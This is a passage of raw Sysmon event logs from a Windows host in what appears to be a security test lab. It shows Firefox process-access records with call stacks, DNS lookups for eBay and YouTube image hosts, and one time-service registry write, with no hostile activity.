Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker.txt2021-01-18 14:00:18.347 10341000x800000000000000017490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.347{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+11c31bc|C:\Program Files\Mozilla Firefox\xul.dll+f7d0bf|C:\Program Files\Mozilla Firefox\xul.dll+f7420a|C:\Program Files\Mozilla Firefox\xul.dll+2259d90|C:\Program Files\Mozilla Firefox\xul.dll+226f63a|C:\Program Files\Mozilla Firefox\xul.dll+2252f19|C:\Program Files\Mozilla Firefox\xul.dll+2252c53|C:\Program Files\Mozilla Firefox\xul.dll+2256ba0|C:\Program Files\Mozilla Firefox\xul.dll+226bd4d|C:\Program Files\Mozilla Firefox\xul.dll+2275208|C:\Program Files\Mozilla Firefox\xul.dll+2274234|C:\Program Files\Mozilla Firefox\xul.dll+225db83|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x800000000000000017489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.160{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.160{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.999{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.952{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.947{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 13241300x800000000000000017531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:00:19.645{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0x41ae9473) 22542200x800000000000000017530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.210{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com0::ffff:172.217.23.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.064{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.054{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.g.ebay.com064.4.253.235;209.140.129.52;209.140.129.67;209.140.129.83;209.140.144.120;209.140.145.48;209.140.147.11;209.140.147.243;209.140.148.139;209.140.148.220;216.113.185.13;64.4.253.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.054{59A5CD1D-945A-6005-3305-00000000A301}7052pulsar.ebay.de0type: 5 pulsar.ebay.com;type: 5 pulsar.g.ebay.com;::ffff:64.4.253.59;::ffff:64.4.253.235;::ffff:209.140.129.52;::ffff:209.140.129.67;::ffff:209.140.129.83;::ffff:209.140.144.120;::ffff:209.140.145.48;::ffff:209.140.147.11;::ffff:209.140.147.243;::ffff:209.140.148.139;::ffff:209.140.148.220;::ffff:216.113.185.13;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.938{59A5CD1D-8E56-6005-2E00-00000000A301}246482.129.140.209.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464240.148.140.209.in-addr.arpa.0type: 12 epage-web-public-1-3-lvsaz02.ebay.com;C:\Windows\sysmon64.exe 22542200x800000000000000017524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.930{59A5CD1D-8E56-6005-2E00-00000000A301}2464202.74.250.142.in-addr.arpa.0type: 12 fra24s02-in-f10.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.582{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.547{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.047{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 